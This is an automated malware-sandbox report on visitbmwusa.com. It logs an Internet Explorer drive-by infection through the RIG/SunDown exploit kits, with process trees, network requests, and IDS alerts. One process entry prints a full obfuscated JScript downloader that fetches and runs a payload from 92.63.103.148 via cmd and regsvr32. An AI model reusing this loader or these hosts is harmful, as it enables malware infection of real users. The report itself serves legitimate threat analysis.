URL: | http://visitbmwusa.com |
Full analysis: | https://app.any.run/tasks/aa7b5064-9ac0-44fe-8971-8258ba8abd75 |
Verdict: | Malicious activity |
Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
Analysis date: | September 19, 2019, 07:19:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | AE33D8341BA5625040C7B6BFF66A1587 |
SHA1: | 66C6FE62CD7633D3C25C0A33E0BBA988DF20E167 |
SHA256: | 76ED86435A97AF5BC15B727CE591BFC0D73D3349C532426CC2F63420C0DEDB91 |
SSDEEP: | 3:N1KIcSI:CIc7 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3868 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3556 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3112 | C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe -Embedding | C:\Windows\system32\Macromed\Flash\FlashUtil32_26_0_0_131_ActiveX.exe | — | svchost.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe® Flash® Player Installer/Uninstaller 26.0 r0 Version: 26,0,0,131 | ||||
3672 | CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this["WScript"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DAAADDDD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>T.t && stArt wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?MzkzNzY2&hODaGjgH&UgAwLmmuHEDRpkH=everyone&CDDOUcH=referred&tmcXPKeVWaW=vest&QLzkjrSSGfbnFmS=difference&t4gdfgf4=-cFPAvpjEXRKg1omNoIVlJB9KupjkiHnRadh5CC_xTYMA0W_qKWErkz2Vz2xrgkLYsk9w&emncMpW=known&tLjALdHlAs=wrapped&HZeSAwqnjw=heartfelt&oDjMWV=everyone&ffhd3s=w3jQMvXcJxbQFYbGMvPDSKNbNknWHViPxomG9MildZaqZGX_k7XDfF-qoVvcCgWRxfUtK&HIonjHzlEoWJkT=known&gXzbUXITbBu=strategy&KGPGVVH=wrapped&ApJbHX=everyone&opvwjYACFMPJvs=referred&NfrqWHBECIhgl=difference&qyTowLDL=referred&LUpFeRJgbUMjA1Mjkx" "¤" | C:\Windows\system32\CMd.exe | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2536 | wsCripT //B //E:JScript T.t "cNNN9ka" "http://92.63.103.148/?MzkzNzY2&hODaGjgH&UgAwLmmuHEDRpkH=everyone&CDDOUcH=referred&tmcXPKeVWaW=vest&QLzkjrSSGfbnFmS=difference&t4gdfgf4=-cFPAvpjEXRKg1omNoIVlJB9KupjkiHnRadh5CC_xTYMA0W_qKWErkz2Vz2xrgkLYsk9w&emncMpW=known&tLjALdHlAs=wrapped&HZeSAwqnjw=heartfelt&oDjMWV=everyone&ffhd3s=w3jQMvXcJxbQFYbGMvPDSKNbNknWHViPxomG9MildZaqZGX_k7XDfF-qoVvcCgWRxfUtK&HIonjHzlEoWJkT=known&gXzbUXITbBu=strategy&KGPGVVH=wrapped&ApJbHX=everyone&opvwjYACFMPJvs=referred&NfrqWHBECIhgl=difference&qyTowLDL=referred&LUpFeRJgbUMjA1Mjkx" "¤" | C:\Windows\system32\wscript.exe | CMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3328 | "C:\Windows\System32\cmd.exe" /c radA8B1A.tmp.exe | C:\Windows\System32\cmd.exe | — | wscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3944 | radA8B1A.tmp.exe | C:\Users\admin\AppData\Local\Temp\Low\radA8B1A.tmp.exe | — | cmd.exe |
User: admin Company: © pdfforge GmbH. Integrity Level: LOW Description: L2tp Explores Was Xinclude Mentality |
PID | Process | Filename | Type | |
---|---|---|---|---|
3556 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3556 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\[email protected][1].txt | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\R01UH5AD\redirect[1].txt | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[2].txt | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\R01UH5AD\google_com[1].txt | — | |
MD5:— | SHA256:— | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:DCDD3604497955559411C7ADB3518BE2 | SHA256:7409973BF7394B9B174FDD03EC1A1CE136E6BB41AF38E32A3C3DBFCEA1B9FD38 | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | |
MD5:739DFB950EC889999C8642E5D950594B | SHA256:08BEA2D70F9E7AFC2B4ED93046FFC904F8BE6EA81CE5B078807E5E8E05FE5BF9 | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:CFC8131831FB146C003A4FE0C0274B2B | SHA256:482FB6A14B579D091804670E8C490004EB491242624933F9C773FE1D8BE78132 | |||
3868 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@google[1].txt | text | |
MD5:756AFF3C6253C34C96B9F99DCF09592D | SHA256:5F59A4774CC74AF756C72A9B65F83ABA711381350E29AE36428FBB137B873052 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3868 | iexplore.exe | GET | 302 | 94.130.90.228:80 | http://atztds37.world/f349ghrewh2 | DE | — | — | suspicious |
3868 | iexplore.exe | GET | 200 | 92.63.103.148:80 | http://92.63.103.148/?NTA1Njkz&IOiA&XWyCT=heartfelt&MPspqTGtY=heartfelt&PPxgMeHUB=criticized&ffhd3s=w3fQMvXcJxnQFYbGMvPDSKNbNknWHViPxomG9MildZmqZGX_k7rDfF-qoVrcCgWR&dQat=community&zDBBqc=constitution&RzDLbHuxJ=heartfelt&iQeUZbRxE=known&WGAhw=strategy&egHX=professional&fZqYPf=strategy&kpEWfXmw=community&ezGRQNVW=strategy&wbivyol=known&XYbjlQWGy=heartfelt&VXzZxgQn=already&t4gdfgf4=xfstK-cFPArpjEXRKgJomNoIVl1B9KupjkaHnRadh5CC_xTYMA0W_qKlJLl_mhj2&MlnPcMjA1NjE4 | RU | html | 27.6 Kb | suspicious |
3868 | iexplore.exe | GET | 200 | 5.79.79.211:80 | http://visitbmwusa.com/ | NL | html | 471 b | malicious |
3868 | iexplore.exe | GET | 200 | 35.171.104.39:80 | http://usa.odysseus-nua.com/zcredirect?visitid=fe9c3c00-daad-11e9-ae06-0a89019c2d40&type=js&browserWidth=1276&browserHeight=560&iframeDetected=false | US | html | 228 b | shared |
3868 | iexplore.exe | GET | 200 | 18.195.30.247:80 | http://re.labooone.com/redirect?target=BASE64aHR0cHM6Ly9nb29nbGUuY29t&ts=1568877617179&hash=rpjP025PrtyH2fgZG7ilNm5_RkuuZ5bOMxWcSgB8CWA&rm=DJ | DE | html | 328 b | shared |
3868 | iexplore.exe | GET | 200 | 35.171.104.39:80 | http://usa.odysseus-nua.com/zcvisitor/fe9c3c00-daad-11e9-ae06-0a89019c2d40?campaignid=9bd27d80-6cbe-11e9-87d5-12077332b422 | US | html | 1010 b | shared |
3868 | iexplore.exe | GET | 302 | 5.79.79.211:80 | http://visitbmwusa.com/ | NL | text | 11 b | malicious |
2536 | wscript.exe | GET | 200 | 92.63.103.148:80 | http://92.63.103.148/?MzkzNzY2&hODaGjgH&UgAwLmmuHEDRpkH=everyone&CDDOUcH=referred&tmcXPKeVWaW=vest&QLzkjrSSGfbnFmS=difference&t4gdfgf4=-cFPAvpjEXRKg1omNoIVlJB9KupjkiHnRadh5CC_xTYMA0W_qKWErkz2Vz2xrgkLYsk9w&emncMpW=known&tLjALdHlAs=wrapped&HZeSAwqnjw=heartfelt&oDjMWV=everyone&ffhd3s=w3jQMvXcJxbQFYbGMvPDSKNbNknWHViPxomG9MildZaqZGX_k7XDfF-qoVvcCgWRxfUtK&HIonjHzlEoWJkT=known&gXzbUXITbBu=strategy&KGPGVVH=wrapped&ApJbHX=everyone&opvwjYACFMPJvs=referred&NfrqWHBECIhgl=difference&qyTowLDL=referred&LUpFeRJgbUMjA1Mjkx | RU | binary | 667 Kb | suspicious |
3556 | iexplore.exe | GET | 404 | 35.171.104.39:80 | http://usa.odysseus-nua.com/favicon.ico | US | html | 940 b | shared |
3868 | iexplore.exe | GET | 200 | 92.63.103.148:80 | http://92.63.103.148/?NTA5MTYz&iGzZRxwiTPczbkd&YHnRAQlYwrwtTF=referred&eqcdfcGFuCn=heartfelt&jWhBEcMaqvLWMP=heartfelt&YPaCzrWIgg=known&LxqCPIeFT=criticized&QPyxQRYToAotG=difference&HasAdxCuefFvO=heartfelt&WjdGSRnjzNR=already&brHDkq=known&uxprHtYzklJKZ=heartfelt&WvSTDuxFgxWB=referred&ffhd3s=wXbQMvXcJwDQDIbGMvrESLtMNknQA0KK2If2_dqyEoH9fGnihNzUSkr76B2aCm3R&KrtiOjaNdon=blackmail&t4gdfgf4=8_R4eLNYPAOwhRSJf1E0mNxbUVgU9_v6jkfUzhaegcLT9EaMUQtN9padHYF4nwvF&oYuQdLSgRVMwqp=known&UlvoJLGqeEQo=already&fiFCKINGrIzHtXY=everyone&iLbZAlMbRQSiNDY3MDk0 | RU | swf | 6.60 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3556 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3556 | iexplore.exe | 18.195.30.247:443 | trk.zeetrackoo.com | Amazon.com, Inc. | DE | suspicious |
3868 | iexplore.exe | 18.195.30.247:80 | trk.zeetrackoo.com | Amazon.com, Inc. | DE | suspicious |
3868 | iexplore.exe | 5.79.79.211:80 | visitbmwusa.com | LeaseWeb Netherlands B.V. | NL | malicious |
3868 | iexplore.exe | 18.195.30.247:443 | trk.zeetrackoo.com | Amazon.com, Inc. | DE | suspicious |
3868 | iexplore.exe | 198.54.112.216:80 | 1451.scenbe.com | Namecheap, Inc. | US | malicious |
3556 | iexplore.exe | 18.195.30.247:80 | trk.zeetrackoo.com | Amazon.com, Inc. | DE | suspicious |
3556 | iexplore.exe | 172.217.16.132:443 | www.google.com | Google Inc. | US | whitelisted |
3556 | iexplore.exe | 35.171.104.39:80 | usa.odysseus-nua.com | Amazon.com, Inc. | US | malicious |
3868 | iexplore.exe | 172.217.16.132:443 | www.google.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
visitbmwusa.com |
| malicious |
1451.scenbe.com |
| malicious |
trk.zeetrackoo.com |
| shared |
re.labooone.com |
| shared |
google.com |
| whitelisted |
www.google.com |
| whitelisted |
usa.odysseus-nua.com |
| shared |
btcseller.club |
| whitelisted |
atztds37.world |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3868 | iexplore.exe | Misc activity | ADWARE [PTsecurity] Redirecting.Zemot (RBN ZeroPark 0-Click) |
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to .world TLD |
3868 | iexplore.exe | Potentially Bad Traffic | ET INFO HTTP Request to Suspicious *.world Domain |
3868 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3868 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS SunDown EK RIP Landing M1 B642 |
3868 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS SunDown EK RIP Landing M1 B643 |
3868 | iexplore.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |
3868 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY Outdated Flash Version M1 |
2536 | wscript.exe | A Network Trojan was detected | ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2 |